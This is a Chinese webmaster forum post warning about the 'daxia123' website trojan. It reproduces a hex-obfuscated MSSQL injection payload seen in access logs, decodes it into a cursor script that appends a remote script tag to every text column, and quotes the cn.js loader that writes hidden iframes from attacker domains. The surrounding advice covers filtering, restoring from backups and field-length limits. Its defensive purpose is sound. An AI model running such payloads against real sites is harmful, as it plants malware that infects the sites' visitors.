daxia123 网站木马近期横扫国内网站【站长都来】

注入攻击拦截的源码:

 dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E6A786D6D74762E636F6D2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s)

 

我把源码转译了一下,大家可以看看,前后你细心看看就知道了,下面是中间部分也就是@s的代码:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.jxmmtv.com/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

 

解决方法有很多种,我简单介绍下思路吧

1、如果是自己的服务器那就简单了,装个iis拦截软件就ok了,也不费事,网上有很多一流的信息监控拦截系统;

2、当然也可以自己过滤了,可以用关键词或长度等都可以;

 

如果您的网站不幸中招了,补救的思路也很重要,好的方法会让您的网站减少损失

思路:

看到我上面转的转的码了吧,仔细分析一下吧,如果你有备份的数据库快拿出来吧,你应该有,最近的,建个测试的库,只要你把上面的sql稍加修改,再通过你建的那个最近的备份库,就可以把你备份之前的数据全部恢复了,然后备份以后的数据也会在,只是部分被截取注入了。

 

下面是一位好心人的文章,大家也可以看看,多了解点:

 

最近网站经常被这样挂马
修改用户数据库挂马,google搜索有2000多网站中招
我的也中招了,我分析了一下。
以下是cn.js的代码
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("cnxxx=");
if (start != -1)
{
}
else
{
  var expires = new Date();
  expires.setTime(expires.getTime()+1*3600*1000);
  document.cookie = "cnxxx=update;expires="+expires.toGMTString();
  document.write(" <iframe src=http://cn.daxia123.cn/cn.htm width=200 height=0> </iframe>");
  document.write(" <iframe src=http://cn.daxia123.cn/s.htm width=200 height=0> </iframe>");
}
而上述引用到的cn.htm的代码是:
<script src="http://s39.cnzz.com/stat.php?id=1184740&web_id=1184740"
language="JavaScript" charset="gb2312"> </script>
可以看出是为了向中国站长网刷IP的。如果有中国站长网的人,请明确一下上述代码的作用,
根据id=1184740&web_id=1184740找出真凶。
而上述引用到的s.htm的代码是一些乱码,我发在附件,高手帮分析一下。
请解决问题的朋友来帮帮忙吧~
猜测会不会是通过sql注入式攻击,但我们的代码已经进行防水处理了,不知道是从哪儿攻击网站的

网上有的朋友找到了下面内容:
目前发现一个问题了,是注入式攻击,通过对访问日志的查看,终于发现了访问有问题,来自IP-121.42.214.238(河北省邯郸市)的访问里面,有一段:
GET  /news/more.asp  classid=18;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E6A786D6D74762E636F6D2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--  80  -  121.42.214.238  Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0)  404  0  3
里面明显地有注入的攻击代码。我猜想会不会是这个引起的病毒,而这一访问也和我的网站中病毒时间吻合,所以强烈建议大家检查你的网站,是不是对程序进行过防水处理了!
快过元旦了,大家都做好安检工作吧~
希望大家帮忙顶,让更多人知道这个木马,让更多人受益
我也做了防止SQL注入的代码,可还是被修改数据库存中内容
下面的是日志
/gqxx/gx_info.asp id=48941';dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E6A786D6D74762E636F6D2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- 80 - 122.9.2.39 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0
我用的就是.net


原因基本查到了,就是攻击者将攻击代码用2进制,或10或10进制编译成了
类似于这样的代码:0x4445434C415245204054205641524348415228323535292C404
放sql注入的代码不能检测出来,但是sql server 会把这样的代码在解释成原来的样子
这样就绕过了sql防注入代码。


但是,这个代码仅对能解释它的sql server这样的数据库有效
针对access这样的不能解释它的数据库类型攻击无效


我也中了这个大侠123的木马,我使用了一个暂时解决的办法,对vachar或nvachar字段长度做了限制,找出该字段最长的字段长度N,然后将该字段的最大长度设为N,发现效果还可以,至少已经有2天没有被注入了,其他如ntext或text字段的就做了一个触发器的限制,不允许插入script。
如果按13楼所说是2进制注入的话,我觉得可以通过判断post值的长度来临时解决,毕竟正常情况下不会传一个这么长的值吧

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章